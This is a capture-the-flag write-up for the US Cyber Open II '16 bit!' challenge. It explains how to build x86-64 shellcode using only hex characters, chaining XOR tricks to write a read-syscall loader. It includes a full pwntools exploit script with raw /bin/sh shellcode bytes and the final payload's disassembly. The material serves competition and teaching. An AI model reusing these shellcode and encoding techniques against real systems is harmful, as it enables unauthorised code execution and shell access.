Tags: shellcode pwn 

Rating: 4.5

# US Cyber Open II - PWN - 16 bit!

## A new and exciting shellcode adventure!

### Description

During the ICC competition we where given a shellcoding challenge to make a base64 encoded shellcode, ie the shellcode could only consist of the characters "a-zA-Z0-9+/=", during an 8 hour ctf we completed it in about 1.5 hours. How long will it take you to create base16 shellcode?

### tl;dr

To solve you had to write shellcode that makes use of xors of known constant data values in order to builds a loader shellcode.

## Triage

We're given a binary that isn't exceptionally interesting. Below is decompiled code from a few key functions that show how it operates.

```c
//code automatically generated by ghidra
undefined8 main(void)

{
void *pvVar1;

setup();
pvVar1 = mmap((void *)0x133713370000,0x1000,7,0x32,-1,0);
if (pvVar1 != (void *)0x133713370000) {
puts("mmap failed");
/* WARNING: Subroutine does not return */
exit(-1);
}
read(0,(void *)0x133713370000,100);
encode(0x133713370000);
(*(code *)0x133713370000)();
return 0;
}

```

Here, the main function creates a new region of memory at 0x133713370000, sets it to RWX permissions (perfect for shellcode) and calls it as a function after reading in and encoding a message. This is a classic shellcode challenge setup designed to quickly allow running of hsellcode, in the real world we'd need to do more work to get our shellcode to run naturally.

```c
//code from ghidra edited to be more concise
char pos[] = "0123456789ABCDEF";
void encode(char *buf)

{
char temp_buffer [128];
memset(temp_buffer,0,0x80);
memmove(temp_buffer,buf,100);
for (int i = 0; i_c < 100; i += 1) {
buf[i * 2 + 1] = pos[temp_buffer[local_c] & 0xf];
buf[i * 2] = pos[(temp_buffer[local_c] >> 4) & 0xf];
}
return;
}

```

What this does in practice is it takes 100 input bytes in a buffer, and then splits them into nibbles (4 bit sections or a half byte), and then encodes each of these nibbles into their corresponding hex representation. This is essentially the same as converting a string of raw bytes into a hex string. In practice, this means we need to build a shellcode only use (uppercase) hex characters.

## Designing our shellcode, big picture

One huge thing to note, we completely lack the instructions we need to call a syscall, which is normally required to do anything of note. However, we are in a RWX segment, and can use our first shellcode to write a new shellcode without the hex character limitation. So we instead are going to write a shellcode that writes a second shellcode that includes characters we are forbidden. This second shellcode is best off being a shellcode loader as well, since a "read" syscall that allows us to load in an arbitrarily large final shellcode can be done with far less bytes than whatever final shellcode we proceed with.

Firstly, for testing of how bytes disassemble to instructions, I used the following website (https://defuse.ca/online-x86-assembler.htm#disassembly). I proceeded with what is essentially brute force, testing out each combination of bytes and seeing if I got a valid instruction. This highlighted many assembly instructions, what is in the following list are purely instructions that I think can help me. With only these instructions (with immediate values altered) I can load in an and execute an arbitrary shellcode.

```asm

32 30 xor dh,BYTE PTR [rax] ; xor dh,BYTE PTR [rax]
34 30 xor al,0x30 ; xor al, imm8
35 30 30 30 30 xor eax,0x30303030 ; xor eax, imm32
30 41 30 xor BYTE PTR [rcx+0x30],al ; xor BYTE PTR [rcx+imm8],al
30 42 30 xor BYTE PTR [rdx+0x30],al ; xor BYTE PTR [rdx+imm8],al
30 43 30 xor BYTE PTR [rbx+0x30],al ; xor BYTE PTR [rbx+imm8],al
30 45 30 xor BYTE PTR [rbp+0x30],al ; xor BYTE PTR [rbp+imm8],al
30 46 30 xor BYTE PTR [rsi+0x30],al ; xor BYTE PTR [rsi+imm8],al
32 41 30 xor al,BYTE PTR [rcx+0x30] ; xor al, BYTE PTR [rcx+imm8]
32 42 30 xor al,BYTE PTR [rdx+0x30] ; xor al, BYTE PTR [rdx+imm8]
32 43 30 xor al,BYTE PTR [rbx+0x30] ; xor al, BYTE PTR [rbx+imm8]
32 45 30 xor al,BYTE PTR [rbp+0x30] ; xor al, BYTE PTR [rbp+imm8]
32 46 30 xor al,BYTE PTR [rsi+0x30] ; xor al, BYTE PTR [rsi+imm8]

```

A quick note on uncommon registers. DH refers to the the upper half of the bottom 16 bits of rdx. So if RDX = 0x012345678abcdef , dh will refer to 0xcd. AL is more common and represents the bottom 8 bits of RAX, so if RAX = 0x012345678abcdef then AL = 0xef

Furthermore, we gain the following assembly instruction from not inputing anything, with there simply being 00 bytes in the empty and unfilled parts of memory.
```
00 00 add BYTE PTR [rax],al
```
This is essentially a NOP as long as [rax] points somewhere unimportant and is writable memory. The default RAX value matches this description.

Additionally, when our shellcode begins execution, the following are the initial contents of the registers we have access to. This was run with aslr off, actual addresses may be more scrambled but they should point towards the same objects.
```
rax = 0x133713370000 -> start of shellcode
rbx = 0x555555555450 -> pointer to the function __libc_csu_init
rcx = 0x555555558060 -> pointer to the hex string "0123456789ABCDEF", comes directly before the .bss segment.
rdx = 0x1337133700c6 -> end of shellcode
rsi = 0x133713370000 -> start of shellcode again
rdi = 0x7fffffffdd30 -> unimportant/frequently changing stack address
rbp = 0x7fffffffdde0 -> unimportant/frequently changing stack address
rsp = 0x7fffffffddc8 -> unimportant/frequently changing stack address
```

Since we have several shellcode "gadgets" that access registers plus a constant offset (that can be represented as 0x30-0x39 or 0x41-0x46), it may be useful to rely on bytes pointed at by these initial register values. We will primarily be using the registers rax, rbx, and rdx. We use rdx as a pointer to a location to write our new shellcode, we use rax (and most frequently, just its last 8 bits al) because we are able to easily alter its value with xor commands. Finally, we use rbx because it points towards a section of code, and this means we will have highly varied and "random" bytes that will remain the same between runs that should be able to be xored together to form any byte.

This gives me the following plan.
-Use a combinaton of different imm8 values with `xor al, imm8` and `xor al, BYTE PTR [rbx+imm8]` to xor al into containing any byte value I want.
-We then store the al value using `xor BYTE PTR [rdx+imm8],al`
-We will need to alter rdx at some point to "move it along" to write more shellcode, we can use `xor dh,BYTE PTR [rax]` for that.

## Building arbitrary al values

We have a total of 32 different bytes we can xor with AL. This is done with all 16 possible imm8 values we have available with `; xor al, imm8` and `xor al, BYTE PTR [rbx+imm8]`. While the former has obvious values, those being 0x30-0x39 + 0x41-0x46, the values are less clear for those referenced around rcx. I dump those values with gdb and assume they remain constant, which is true thanks to them being in an executable segment without any major relocations.

```
x/10bx 10bx $rbx+0x30
0x55897bb67480 <__libc_csu_init+48>: 0x03 0x74 0x1b 0x31 0xdb 0x0f 0x1f 0x00
0x55897bb67488 <__libc_csu_init+56>: 0x4c 0x89
x/6bx $rbx+0x41
0x55897bb67491 <__libc_csu_init+65>: 0x41 0xff 0x14 0xdf 0x48 0x83
```

I then try all combinations of xoring these bytes together, and then choose the combination that xors AL by a given constant value in the shortest number of bytes.

## What do we write?

It takes us on average about 8 bytes to write a single arbitrary byte elsewhere in the binary. This means we need to have a shellcode no longer than around 20 bytes. Our best option for this size constraint is a read shellcode loader. The following is a simple loader that does the job.
```
48 31 ff xor rdi,rdi
48 89 d6 mov rsi,rdx
48 c7 c2 00 10 00 00 mov rdx,0x1000
48 31 c0 xor rax,rax
0f 05 syscall
```

Due to writing constraints, we split it up into the following chunks. We need to ensure that the gap between any two chunks is a multiple of two, to ensure that the \x00 bytes pair up and act as a nop.
```

rcx + 0x30: 48 31 ff xor rdi,rdi ; set rdi to 0, to read from stdin
rcx + 0x33: 48 89 d6 mov rsi,rdx ; set rsi to the end of the original shellcode as a location to read in

rcx + 0x131: 48 c7 c2 00 10 00 00 mov rdx,0x1000 ; a nice big buffer size

rcx + 0x142: 48 31 c0 xor rax,rax ; sets rax = 0, this WILL make \x00\x00 bytes segfault rather than NOP
rcx + 0x145: 0f 05 syscall
```

When this shellcode loader runs, I can feed in a new shellcode of up to 0x1000 bytes that will be thrown into rdx, which points at the original end of the shellcode. This should then overwrite all our work with a new, beautiful shellcode that executes /bin/sh.

## Pulling it all together.

I wrote the following script to automatically build the shellcode. However, I also could have manually built it. As a whole, scripting is faster so I advise doing it where possible.

```python
from pwn import *

p = process("./sixteen", env={"LD_PRELOAD": "/home/bee/hackinghobby/cyberopen/libc.so.6"})
#p = remote("0.cloud.chals.io", 23261)

gdb.attach(p)

xors = dict()
xors[0x0] = b""
xors[0x03] = b"\x32\x43\x30"
xors[0x74] = b"\x32\x43\x31"
xors[0x1b] = b"\x32\x43\x32"
xors[0x31] = b"\x32\x43\x33"
xors[0xdb] = b"\x32\x43\x34"
xors[0x0f] = b"\x32\x43\x35"
xors[0x1f] = b"\x32\x43\x36"
xors[0x00] = b"\x32\x43\x37"
xors[0x4c] = b"\x32\x43\x38"
xors[0x89] = b"\x32\x43\x39"
xors[0x41] = b"\x32\x43\x41"
xors[0xff] = b"\x32\x43\x42"
xors[0x14] = b"\x32\x43\x43"
xors[0xdf] = b"\x32\x43\x44"
xors[0x48] = b"\x32\x43\x45"
xors[0x83] = b"\x32\x43\x46"
xors[0x30] = b"\x34\x30"
xors[0x31] = b"\x34\x31"
xors[0x32] = b"\x34\x32"
xors[0x33] = b"\x34\x33"
xors[0x34] = b"\x34\x34"
xors[0x35] = b"\x34\x35"
xors[0x36] = b"\x34\x36"
xors[0x37] = b"\x34\x37"
xors[0x38] = b"\x34\x38"
xors[0x39] = b"\x34\x39"
xors[0x41] = b"\x34\x41"
xors[0x42] = b"\x34\x42"
xors[0x43] = b"\x34\x43"
xors[0x44] = b"\x34\x44"
xors[0x45] = b"\x34\x45"
xors[0x46] = b"\x34\x46"

#Iteratively xor all known xor differences by all other known differences, if we create a new xor record it
#If our new sequence is mroe efficient, also record it.
for loops in range(8):
for q in range(256):
if q not in xors:
continue
for i in range(256):
if i not in xors:
continue
combo = i ^ q
new = xors[i] + xors[q]
if combo not in xors:
xors[combo] = new
if len(new) < len(xors[combo]):
xors[combo] = new
total = 0
for x in range(256):
print(hex(x), len(xors[x]), xors[x])
total += len(xors[x])
print("Avg bytes per AL xor", total/256.0)

def write_rdx_off(off):
return bytes([0x30, 0x42, off])

#we keep a global state of the last al value, to ensure we're always xoring based on the last known value
simul_al = 0x0
def get_xor(goal):
global simul_al
a = xors[goal^simul_al]
simul_al = goal
return a

def make_shellcode():
# a bit of prelude, this is essentially a NOP that guarantees [rax] points towards 0x30 while [rax+1] points towards 0x30
shellcode = b"\x30\x31\x30\x31"
#cluster these two writes together for optimization reasons
shellcode += get_xor(0x48)
shellcode += write_rdx_off(0x31)
shellcode += write_rdx_off(0x34)
shellcode += get_xor(0xff)
shellcode += write_rdx_off(0x33)
shellcode += get_xor(0x31)
shellcode += write_rdx_off(0x32)
shellcode += get_xor(0x89)
shellcode += write_rdx_off(0x35)
shellcode += get_xor(0xd6)
shellcode += write_rdx_off(0x36)

#This xors rdx by 0x100 by xoring dh first by [rax+1] and then by [rax].
shellcode += get_xor(0x1)
shellcode += b"\x32\x30"
shellcode += get_xor(0x0)
shellcode += b"\x32\x30"

#now add the final bit of shellcode
shellcode += get_xor(0x48)
shellcode += write_rdx_off(0x31)
shellcode += get_xor(0xc7)
shellcode += write_rdx_off(0x32)
shellcode += get_xor(0xc2)
shellcode += write_rdx_off(0x33)
shellcode += get_xor(0x08)
shellcode += write_rdx_off(0x35)
shellcode += get_xor(0x48)
shellcode += write_rdx_off(0x42)
shellcode += get_xor(0x31)
shellcode += write_rdx_off(0x43)
shellcode += get_xor(0xc0)
shellcode += write_rdx_off(0x44)
shellcode += get_xor(0xf)
shellcode += write_rdx_off(0x45)
shellcode += get_xor(0x5)
shellcode += write_rdx_off(0x46)
#ensure our shellcode is of an even length
if len(shellcode) % 2 == 1:
shellcode += b"\x32\x43\x30"
return shellcode


#Helper for feeding shellcode into the program
def encode(msg):
byted = b""
print(msg)
assert len(msg) % 2 == 0
for i in range(0,len(msg),2):
mapped = b"0123456789ABCDEF"
a = mapped.index(msg[i])
b = mapped.index(msg[i+1])
#print(a, b)
byted += bytearray([(a << 4) + b])
return byted


code = make_shellcode()
print(len(code))
p.recvuntil("Data:")
p.sendline(encode(code))
#input("waiting")

#feed in a nop sled following by a /bin/sh shellcode
binsh = b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"

p.sendline(b"\x90"*0x300 +binsh)
p.interactive()
```

Final shellcode assembly.
```
0: 30 31 xor BYTE PTR [rcx],dh
2: 30 31 xor BYTE PTR [rcx],dh
4: 32 43 45 xor al,BYTE PTR [rbx+0x45]
7: 30 42 31 xor BYTE PTR [rdx+0x31],al
a: 30 42 34 xor BYTE PTR [rdx+0x34],al
d: 32 43 46 xor al,BYTE PTR [rbx+0x46]
10: 34 34 xor al,0x34
12: 30 42 33 xor BYTE PTR [rdx+0x33],al
15: 32 43 42 xor al,BYTE PTR [rbx+0x42]
18: 34 31 xor al,0x31
1a: 30 42 32 xor BYTE PTR [rdx+0x32],al
1d: 32 43 39 xor al,BYTE PTR [rbx+0x39]
20: 34 31 xor al,0x31
22: 30 42 35 xor BYTE PTR [rdx+0x35],al
25: 34 44 xor al,0x44
27: 32 43 32 xor al,BYTE PTR [rbx+0x32]
2a: 30 42 36 xor BYTE PTR [rdx+0x36],al
2d: 32 43 44 xor al,BYTE PTR [rbx+0x44]
30: 34 30 xor al,0x30
32: 34 38 xor al,0x38
34: 32 30 xor dh,BYTE PTR [rax]
36: 34 31 xor al,0x31
38: 34 30 xor al,0x30
3a: 32 30 xor dh,BYTE PTR [rax]
3c: 32 43 45 xor al,BYTE PTR [rbx+0x45]
3f: 30 42 31 xor BYTE PTR [rdx+0x31],al
42: 32 43 39 xor al,BYTE PTR [rbx+0x39]
45: 34 32 xor al,0x32
47: 34 34 xor al,0x34
49: 30 42 32 xor BYTE PTR [rdx+0x32],al
4c: 34 35 xor al,0x35
4e: 34 30 xor al,0x30
50: 30 42 33 xor BYTE PTR [rdx+0x33],al
53: 32 43 42 xor al,BYTE PTR [rbx+0x42]
56: 34 35 xor al,0x35
58: 30 42 35 xor BYTE PTR [rdx+0x35],al
5b: 34 43 xor al,0x43
5d: 32 43 30 xor al,BYTE PTR [rbx+0x30]
60: 30 42 42 xor BYTE PTR [rdx+0x42],al
63: 34 41 xor al,0x41
65: 34 38 xor al,0x38
67: 30 42 43 xor BYTE PTR [rdx+0x43],al
6a: 32 43 42 xor al,BYTE PTR [rbx+0x42]
6d: 34 36 xor al,0x36
6f: 34 38 xor al,0x38
71: 30 42 44 xor BYTE PTR [rdx+0x44],al
74: 32 43 42 xor al,BYTE PTR [rbx+0x42]
77: 34 30 xor al,0x30
79: 30 42 45 xor BYTE PTR [rdx+0x45],al
7c: 34 38 xor al,0x38
7e: 34 32 xor al,0x32
80: 30 42 46 xor BYTE PTR [rdx+0x46],al
83: 32 43 30 xor al,BYTE PTR [rbx+0x30]
```

But this is all simply the hex string "01012CE0B10B42CF440B32CB410B22C9410B54D2C20B62CD4048204140202CE0B12C942440B245400B32CB450B54C2C00BB4A480BC2CB46480BD2CB400BE48420BF2C0".

Original writeup (https://github.com/BeesAreCool/ctf-writeups/blob/main/writeups/cyberopen_sixteen_bit.md).